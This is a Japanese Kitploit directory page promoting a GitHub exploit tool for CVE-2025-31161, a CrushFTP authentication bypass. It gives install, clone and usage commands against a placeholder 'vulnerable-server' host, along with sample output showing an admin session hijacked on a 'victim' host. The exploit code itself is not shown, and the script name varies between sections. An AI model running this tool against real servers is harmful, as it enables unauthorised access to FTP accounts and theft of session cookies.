Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-31161 — CrushFTP CVE-2025-31161 エクスプロイトツール 🔓 | Kitploit
ツール/GitHubGitHub/tx-one/cve-2025-31161
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト認証
GitHubtx-one/cve-2025-31161

CVE-2025-31161

CrushFTP CVE-2025-31161 エクスプロイトツール 🔓

リポジトリを見る
21年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CrushFTP CVE-2025-31161 エクスプロイトツール 🔓

脆弱なCrushFTPバージョンにおけるCVE-2025-31161脆弱性の高度な検出およびエクスプロイトツール。

CVE-2025-31161 は、CrushFTP Webインターフェースにおける重大な認証バイパス脆弱性です。HTTP Authorization ヘッダーを操作することで、認証されていない攻撃者が正しいパスワードを提供せずに任意の有効なユーザー名で完全なアクセスを得ることができます。

影響を受けるバージョン

CrushFTP 9.3.8

CrushFTP 9.3.9

CrushFTP 9.3.10

CrushFTP 9.3.11

CrushFTP 9.3.12

CrushFTP Enterprise 9.3.12.5 より前のバージョン

主な機能 🚀

  • CrushFTPバージョンの自動検出と脆弱性検証
  • マルチスレッド認証情報テストによる迅速なユーザー列挙
  • 二重認証方式のサポート (Bearer Token & Basic Auth)
  • セッションクッキーを含むJSONレポート生成
  • カスタム設定によるスマートな接続再試行メカニズム
  • 詳細なログ出力付きのカラー化されたコンソール出力
  • 脆弱なバージョンの範囲:
    • 9.3.8 から 9.3.12.5 まで

必要条件 📋

  • Python 3.8以上

  • 必要なパッケージ:

    root@kitploit:~
    pip install requests colorama urllib3
    

    インストール 🛠️

  1. 依存関係をインストール:
root@kitploit:~
 pip install requests colorama urllib3
  1. リポジトリをクローン:
root@kitploit:~
 git clone https://github.com/TX-One/CVE-2025-31161.git
 cd CVE-2025-31161
 python3 tx-crush.py -h

使い方 🖥️

基本コマンド:

root@kitploit:~
python3 CVE-2025-31161.py -t https://target:8080 -u users.txt -o results.json

オプション:

root@kitploit:~
-h, --help            show this help message and exit
  -t, --target TARGET   Target URL (e.g., https://example.com:8080)
  -u, --users USERS     File containing username list
  -o, --output OUTPUT   Output JSON file
  -T, --threads THREADS
                        Number of threads (default: 5)
  --no-ssl              Disable SSL verification
  --timeout TIMEOUT     Request timeout (default: 15)
  --retries RETRIES     Number of retries (default: 3)
  --force               Bypass version check

詳細な例:

root@kitploit:~
python3 exploit.py
  -t https://vulnerable-server.com:8000
  -u ./wordlists/common_users.txt
  -o ./results/compromised.json
  -T 10
  --retries 5
  --timeout 20

出力サンプル 📄

root@kitploit:~
[
  {
    "target": "https://victim:8080",
    "user": "admin",
    "success": true,
    "method": "Bearer",
    "cookies": {"sessionID": "a1b2c3..."},
    "server_version": "CrushFTP/9.3.12"
  }
]
root@kitploit:~
[
  {
        "target": "http://victim:8080",
        "user": "admin",
        "success": false
    }
]

免責事項: このプロジェクトは教育およびセキュリティ研究目的のみに使用されます。責任ある使用が必要です。

ツールをダウンロード